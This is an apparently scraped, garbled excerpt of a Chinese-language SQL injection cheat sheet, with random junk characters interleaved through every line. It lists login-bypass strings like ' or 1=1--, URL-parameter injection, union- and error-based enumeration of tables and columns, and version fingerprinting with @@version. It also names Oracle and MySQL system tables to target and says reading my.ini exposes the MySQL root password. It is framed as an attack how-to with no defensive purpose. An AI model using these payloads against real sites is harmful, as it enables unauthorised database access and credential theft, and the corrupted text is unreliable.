0 x" K4 J* u3 e/ o! l$ E5 h7 f( H9 ~: u2 m
2. 首先你用简单的进行尝试。 * K2 _0 ]1 T) o7 a6 m: q' l3 W5 a/ ?/ m
- Login:' or 1=1--/ [' C! A* N# k
- Pass:' or 1=1-- 7 U. y7 e, P D/ `' H; j9 w$ Z! E Y- http://website/index.asp?id=' or 1=1--; K# R! Z- \ f5 h7 O3 b% C4 A
这些是简单的方法,其他如下:! ~* F* `1 z- b7 E
( N+ C. n: w% J3 B" t% h, J/ h
- ' having 1=1--, o5 k$ ]7 k( `. `- `
- ' group by userid having 1=1--6 O4 i C R' O3 F& K7 q6 U! q
- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename')-- V' F7 Q3 l/ c# {7 {9 T5 I- ' union select sum(columnname) from tablename--3 M1 a- O3 D5 q8 v
2 S/ C+ j7 R) b3 W- h
/ R9 i. B* Y$ O8 Q' r# ]6 I
; Y' @: g$ B, G2 E1 m3.收集信息& l( R3 r( I' ]4 ?2 u- L
" w5 J, z i0 T% p
- ' or 1 in (select @@version)--' D8 e/ O% a1 }) u( w% v
- ' union all select @@version-- /*这个优秀; n8 S$ m T/ @
这些能找到计算机,操作系统,补丁的真实版本。6 H1 \9 e. _5 e, d& D# {
$ f: I% g# y9 B) S. x " E8 P, i9 M) K# _- @* ? ) t" E0 J9 f% H4.数据类型 $ e$ H& U$ }. h# x4 S& \+ u) ^$ U( D# c
Oracle 扩展 + c. \1 H2 ~6 ~3 Q! g5 {+ G-->SYS.USER_OBJECTS (USEROBJECTS) " b T7 F9 E, I-->SYS.USER_VIEWS + O9 ]) z+ D5 G! {( ~1 n$ W-->SYS.USER_TABLES 4 Y8 q' @8 m$ D1 V( r) p-->SYS.USER_VIEWS9 D1 Y9 y$ ?- T D$ F
-->SYS.USER_TAB_COLUMNS " L0 f, ], e! z9 c/ s-->SYS.USER_CATALOG# Q& G% }! ?% N: {0 I7 i2 v
-->SYS.USER_TRIGGERS . T- E; Q/ a& F9 Z) C6 X! Q7 H* c, K-->SYS.ALL_TABLES9 ]) G3 M n8 `6 M
-->SYS.TAB 4 m! _2 _1 g" a( r. I6 a% Z z1 ^2 Q + M9 L- G R; b# X+ IMySQL 数据库, C:\WINDOWS>type my.ini得到root密码. _# {( r0 F# N2 B5 Z0 o
-->mysql.user: n9 m9 h) ?4 d( f0 {! M
-->mysql.host8 g H. V" c8 v5 A/ m0 h. a& ~
-->mysql.db6 B, c( W! ~% l) W* v7 n